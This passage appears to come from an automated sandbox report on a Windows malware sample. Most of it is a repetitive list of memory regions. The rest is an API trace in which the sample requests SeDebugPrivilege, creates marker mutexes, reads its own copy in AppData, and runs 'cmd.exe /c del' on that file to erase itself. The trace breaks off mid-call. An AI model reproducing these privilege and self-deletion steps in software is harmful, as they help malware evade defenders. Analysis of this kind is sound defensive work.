"private_0x00000000002e0000" filename = "" Region: id = 4561 start_va = 0x2e0000 end_va = 0x2effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 4562 start_va = 0x2e0000 end_va = 0x2effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 4563 start_va = 0x2e0000 end_va = 0x2effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 4564 start_va = 0x2e0000 end_va = 0x2effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 4565 start_va = 0x2e0000 end_va = 0x2effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 4566 start_va = 0x2e0000 end_va = 0x2effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 4567 start_va = 0x2e0000 end_va = 0x2effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 4568 start_va = 0x2e0000 end_va = 0x2effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 4569 start_va = 0x2e0000 end_va = 0x2effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 4570 start_va = 0x2e0000 end_va = 0x2effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 4571 start_va = 0x2e0000 end_va = 0x2effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 4572 start_va = 0x2e0000 end_va = 0x2effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 4573 start_va = 0x2e0000 end_va = 0x2effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 4574 start_va = 0x2e0000 end_va = 0x2effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 4575 start_va = 0x2e0000 end_va = 0x2effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 4576 start_va = 0x2e0000 end_va = 0x2effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 4577 start_va = 0x2e0000 end_va = 0x2effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 4578 start_va = 0x2e0000 end_va = 0x2effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 4579 start_va = 0x2e0000 end_va = 0x2effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 4580 start_va = 0x2e0000 end_va = 0x2effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 4582 start_va = 0x2e0000 end_va = 0x2effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 4584 start_va = 0x2e0000 end_va = 0x2effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 4587 start_va = 0x2e0000 end_va = 0x2effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 4588 start_va = 0x2e0000 end_va = 0x2effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 4589 start_va = 0x2e0000 end_va = 0x2effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 4590 start_va = 0x2e0000 end_va = 0x2effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 4591 start_va = 0x2e0000 end_va = 0x2effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 4592 start_va = 0x2e0000 end_va = 0x2effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 4605 start_va = 0x2e0000 end_va = 0x2effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 4623 start_va = 0x2e0000 end_va = 0x2effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 4655 start_va = 0x2e0000 end_va = 0x2effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 4667 start_va = 0x2e0000 end_va = 0x2effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 4668 start_va = 0x2e0000 end_va = 0x2effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 4691 start_va = 0x2e0000 end_va = 0x2effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 4692 start_va = 0x2e0000 end_va = 0x2effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 4693 start_va = 0x2e0000 end_va = 0x2effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 4694 start_va = 0x2e0000 end_va = 0x2effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 4695 start_va = 0x2e0000 end_va = 0x2effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 4696 start_va = 0x2e0000 end_va = 0x2effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 4697 start_va = 0x2e0000 end_va = 0x2effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 4698 start_va = 0x2e0000 end_va = 0x2effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 4699 start_va = 0x2e0000 end_va = 0x2effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 4700 start_va = 0x2e0000 end_va = 0x2effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 4701 start_va = 0x2e0000 end_va = 0x2effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 4702 start_va = 0x2e0000 end_va = 0x2effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 4703 start_va = 0x2e0000 end_va = 0x2effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 4704 start_va = 0x2e0000 end_va = 0x2effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 4705 start_va = 0x2e0000 end_va = 0x2effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 4706 start_va = 0x2e0000 end_va = 0x2effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 4707 start_va = 0x2e0000 end_va = 0x2effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 4708 start_va = 0x2e0000 end_va = 0x2effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 4709 start_va = 0x2e0000 end_va = 0x2effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 4710 start_va = 0x2e0000 end_va = 0x2effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 4711 start_va = 0x2e0000 end_va = 0x2effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 4712 start_va = 0x2e0000 end_va = 0x2effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 4713 start_va = 0x2e0000 end_va = 0x2effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 4714 start_va = 0x2e0000 end_va = 0x2effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 4715 start_va = 0x2e0000 end_va = 0x2effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 4716 start_va = 0x2e0000 end_va = 0x2effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 4717 start_va = 0x2e0000 end_va = 0x2effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 4718 start_va = 0x2e0000 end_va = 0x2effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 4719 start_va = 0x2e0000 end_va = 0x2effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 4720 start_va = 0x2e0000 end_va = 0x2effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 4721 start_va = 0x2e0000 end_va = 0x2effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 4722 start_va = 0x2e0000 end_va = 0x2effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 4723 start_va = 0x2e0000 end_va = 0x2effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 4724 start_va = 0x2e0000 end_va = 0x2effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 4725 start_va = 0x2e0000 end_va = 0x2effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 4726 start_va = 0x2e0000 end_va = 0x2effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 4728 start_va = 0x2e0000 end_va = 0x2effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 4729 start_va = 0x2e0000 end_va = 0x2effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 4730 start_va = 0x2e0000 end_va = 0x2effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 4731 start_va = 0x2e0000 end_va = 0x2effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 4739 start_va = 0x2e0000 end_va = 0x2effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 4742 start_va = 0x2e0000 end_va = 0x2effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 4743 start_va = 0x2e0000 end_va = 0x2effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 4744 start_va = 0x2e0000 end_va = 0x2effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 4750 start_va = 0x2e0000 end_va = 0x2effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 4751 start_va = 0x2e0000 end_va = 0x2effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 4752 start_va = 0x2e0000 end_va = 0x2effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 4753 start_va = 0x2e0000 end_va = 0x2effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 4754 start_va = 0x2e0000 end_va = 0x2effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 4755 start_va = 0x2e0000 end_va = 0x2effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 4756 start_va = 0x2e0000 end_va = 0x2effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 4757 start_va = 0x2e0000 end_va = 0x2effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 4759 start_va = 0x2e0000 end_va = 0x2effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 4760 start_va = 0x2e0000 end_va = 0x2effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 4761 start_va = 0x2e0000 end_va = 0x2effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 4762 start_va = 0x2e0000 end_va = 0x2effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 4763 start_va = 0x2e0000 end_va = 0x2effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 4764 start_va = 0x2e0000 end_va = 0x2effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 4765 start_va = 0x2e0000 end_va = 0x2effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 4766 start_va = 0x2e0000 end_va = 0x2effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 4767 start_va = 0x2e0000 end_va = 0x2effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 4768 start_va = 0x2e0000 end_va = 0x2effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Thread: id = 132 os_tid = 0xedc [0130.678] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x19f2a0 | out: HeapArray=0x19f2a0*=0x400000) returned 0x2 [0130.695] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Windows\\SysWOW64\\ntdll.dll", NtPathName=0x19f250, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Windows\\SysWOW64\\ntdll.dll", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0130.698] NtCreateFile (in: FileHandle=0x19f270, DesiredAccess=0x120089, ObjectAttributes=0x19f238*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Windows\\SysWOW64\\ntdll.dll", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19f258, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19f270*=0x9c, IoStatusBlock=0x19f258*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0130.711] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x416510) returned 1 [0130.715] NtQueryInformationFile (in: FileHandle=0x9c, IoStatusBlock=0x19f258, FileInformation=0x19f1b0, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x19f258, FileInformation=0x19f1b0) returned 0x0 [0130.722] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x13bb40) returned 0x830020 [0131.141] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Windows\\SysWOW64\\ntdll.dll", NtPathName=0x19f1f0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Windows\\SysWOW64\\ntdll.dll", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0131.141] NtCreateFile (in: FileHandle=0x19f210, DesiredAccess=0x120089, ObjectAttributes=0x19f1d8*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Windows\\SysWOW64\\ntdll.dll", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19f1f8, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19f210*=0x9c, IoStatusBlock=0x19f1f8*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0131.141] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x416510) returned 1 [0131.141] NtQueryInformationFile (in: FileHandle=0x9c, IoStatusBlock=0x19f1f8, FileInformation=0x19ef6c, Length=0x208, FileInformationClass=0x9 | out: IoStatusBlock=0x19f1f8, FileInformation=0x19ef6c) returned 0x0 [0131.141] NtClose (Handle=0x9c) returned 0x0 [0131.142] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x208) returned 0x416510 [0131.142] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x416510) returned 1 [0131.145] NtQueryVirtualMemory (in: ProcessHandle=0xffffffff, Address=0x75131320, VirtualMemoryInformationClass=0x0, VirtualMemoryInformation=0x19f22c, Length=0x1c, ResultLength=0x0 | out: VirtualMemoryInformation=0x19f22c*(BaseAddress=0x75131000, AllocationBase=0x75130000, AllocationProtect=0x80, RegionSize=0x3000, State=0x1000, Protect=0x20, Type=0x1000000), ResultLength=0x0) returned 0x0 [0131.627] NtQuerySystemInformation (in: SystemInformationClass=0x23, SystemInformation=0x19f284, Length=0x2, ResultLength=0x0 | out: SystemInformation=0x19f284, ResultLength=0x0) returned 0x0 [0131.631] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x7, ProcessInformation=0x19f2a8, ProcessInformationLength=0x4, ReturnLength=0x0 | out: ProcessInformation=0x19f2a8, ReturnLength=0x0) returned 0x0 [0131.640] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x970020) returned 1 [0131.653] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ef38*=0x0, ZeroBits=0x0, RegionSize=0x19ef3c*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ef38*=0x120000, RegionSize=0x19ef3c*=0x10000) returned 0x0 [0131.657] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x120000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x120000, ResultLength=0x0) returned 0xc0000004 [0131.664] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f298*=0x120000, RegionSize=0x19ef5c, FreeType=0x8000) returned 0x0 [0131.664] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ef24*=0x0, ZeroBits=0x0, RegionSize=0x19ef28*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ef24*=0x120000, RegionSize=0x19ef28*=0x20000) returned 0x0 [0131.664] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x120000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x120000, ResultLength=0x0) returned 0x0 [0131.696] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f298*=0x120000, RegionSize=0x19f29c, FreeType=0x8000) returned 0x0 [0131.711] RtlQueryEnvironmentVariable_U (in: Environment=0x0, Name="USERNAME", Value=0x19f054 | out: Value="kEecfMwgj") returned 0x0 [0131.717] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x28, TokenHandle=0x19f2b0 | out: TokenHandle=0x19f2b0*=0x9c) returned 0x0 [0131.721] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x19f2a4 | out: lpLuid=0x19f2a4*(LowPart=0x14, HighPart=0)) returned 1 [0131.732] NtAdjustPrivilegesToken (in: TokenHandle=0x9c, DisableAllPrivileges=0, NewState=0x19f2a0, BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 0x106 [0131.735] NtClose (Handle=0x9c) returned 0x0 [0131.735] RtlQueryEnvironmentVariable_U (in: Environment=0x0, Name="USERNAME", Value=0x19edf8 | out: Value="kEecfMwgj") returned 0x0 [0131.735] RtlQueryEnvironmentVariable_U (in: Environment=0x0, Name="N6NQC5EB", Value=0x19f090 | out: Value=0x19f090) returned 0xc0000100 [0131.735] RtlQueryEnvironmentVariable_U (in: Environment=0x0, Name="USERNAME", Value=0x19ebd8 | out: Value="kEecfMwgj") returned 0x0 [0131.739] NtOpenDirectoryObject (in: FileHandle=0x19ee84, DesiredAccess=0x2000f, ObjectAttributes=0x19ee50*(Length=0x18, RootDirectory=0x0, ObjectName="\\BaseNamedObjects", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0) | out: FileHandle=0x19ee84*=0x9c) returned 0x0 [0131.741] NtCreateMutant (in: MutantHandle=0x19f0b0, DesiredAccess=0x1f0001, ObjectAttributes=0x19ee38*(Length=0x18, RootDirectory=0x9c, ObjectName="N6NQC5EBS4E45L55", Attributes=0x80, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), InitialOwner=0 | out: MutantHandle=0x19f0b0*=0xe0) returned 0x0 [0131.741] NtClose (Handle=0x9c) returned 0x0 [0131.741] RtlQueryEnvironmentVariable_U (in: Environment=0x0, Name="USERNAME", Value=0x19eab8 | out: Value="kEecfMwgj") returned 0x0 [0131.742] NtOpenDirectoryObject (in: FileHandle=0x19ee7c, DesiredAccess=0x2000f, ObjectAttributes=0x19ee48*(Length=0x18, RootDirectory=0x0, ObjectName="\\BaseNamedObjects", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0) | out: FileHandle=0x19ee7c*=0x9c) returned 0x0 [0131.742] NtCreateMutant (in: MutantHandle=0x19f0a8, DesiredAccess=0x1f0001, ObjectAttributes=0x19ee30*(Length=0x18, RootDirectory=0x9c, ObjectName="0-M2CU8WC2158WZz", Attributes=0x80, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), InitialOwner=0 | out: MutantHandle=0x19f0a8*=0xe4) returned 0x0 [0131.742] NtClose (Handle=0x9c) returned 0x0 [0131.754] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x1000) returned 0x41a648 [0131.755] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x1000) returned 0x41b650 [0131.755] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x1000) returned 0x41c658 [0131.760] RtlQueryEnvironmentVariable_U (in: Environment=0x0, Name="ProgramFiles", Value=0x19ecc0 | out: Value="C:\\Program Files (x86)") returned 0x0 [0131.760] RtlQueryEnvironmentVariable_U (in: Environment=0x0, Name="APPDATA", Value=0x19ecec | out: Value="C:\\Users\\kEecfMwgj\\AppData\\Roaming") returned 0x0 [0131.771] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Roaming\\ibeframnk863.exe", NtPathName=0x19ec98, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Roaming\\ibeframnk863.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0131.773] NtCreateFile (in: FileHandle=0x19ecb8, DesiredAccess=0x120089, ObjectAttributes=0x19ec80*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Roaming\\ibeframnk863.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19eca0, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19ecb8*=0x0, IoStatusBlock=0x19eca0*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0131.774] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x41d660) returned 1 [0131.774] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\ibeframnk863.exe", NtPathName=0x19f068, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\ibeframnk863.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0131.774] NtCreateFile (in: FileHandle=0x19f088, DesiredAccess=0x120089, ObjectAttributes=0x19f050*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\ibeframnk863.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19f070, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19f088*=0x9c, IoStatusBlock=0x19f070*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0131.774] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x41d660) returned 1 [0131.778] NtQueryInformationFile (in: FileHandle=0x9c, IoStatusBlock=0x19f070, FileInformation=0x19efc8, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x19f070, FileInformation=0x19efc8) returned 0x0 [0131.778] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x98c00) returned 0x830020 [0131.796] NtReadFile (in: FileHandle=0x9c, Event=0x0, UserApcRoutine=0x0, UserApcContext=0x0, IoStatusBlock=0x19f070, Buffer=0x830020, BufferLength=0x98800, ByteOffset=0x19efe0*=0, Key=0x0 | out: IoStatusBlock=0x19f070, Buffer=0x830020*) returned 0x0 [0131.804] NtClose (Handle=0x9c) returned 0x0 [0131.804] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\ibeframnk863.exe", NtPathName=0x19f058, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\ibeframnk863.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0131.804] NtCreateFile (in: FileHandle=0x19f078, DesiredAccess=0x120089, ObjectAttributes=0x19f040*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\ibeframnk863.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19f060, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19f078*=0x9c, IoStatusBlock=0x19f060*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0131.804] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x41d660) returned 1 [0131.804] NtQueryInformationFile (in: FileHandle=0x9c, IoStatusBlock=0x19f060, FileInformation=0x19efb8, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x19f060, FileInformation=0x19efb8) returned 0x0 [0131.804] NtClose (Handle=0x9c) returned 0x0 [0131.806] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Windows\\SysWOW64\\ntdll.dll", NtPathName=0x19e558, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Windows\\SysWOW64\\ntdll.dll", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0131.806] NtCreateFile (in: FileHandle=0x19e578, DesiredAccess=0x120089, ObjectAttributes=0x19e540*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Windows\\SysWOW64\\ntdll.dll", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19e560, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19e578*=0x9c, IoStatusBlock=0x19e560*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0131.806] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x41d660) returned 1 [0131.806] NtQueryInformationFile (in: FileHandle=0x9c, IoStatusBlock=0x19e560, FileInformation=0x19e2d4, Length=0x208, FileInformationClass=0x9 | out: IoStatusBlock=0x19e560, FileInformation=0x19e2d4) returned 0x0 [0131.807] NtClose (Handle=0x9c) returned 0x0 [0131.807] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x208) returned 0x41d660 [0131.807] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x41d660) returned 1 [0131.809] CreateProcessInternalW (in: hUserToken=0x0, lpApplicationName="C:\\Windows\\SysWOW64\\cmd.exe", lpCommandLine="/c del \"C:\\Users\\kEecfMwgj\\AppData\\Roaming\\ibeframnk863.exe\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x19ec28*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x19ec6c, hNewToken=0x0 | out: lpProcessInformation=0x19ec6c*(hProcess=0xe8, hThread=0x9c, dwProcessId=0xeec, 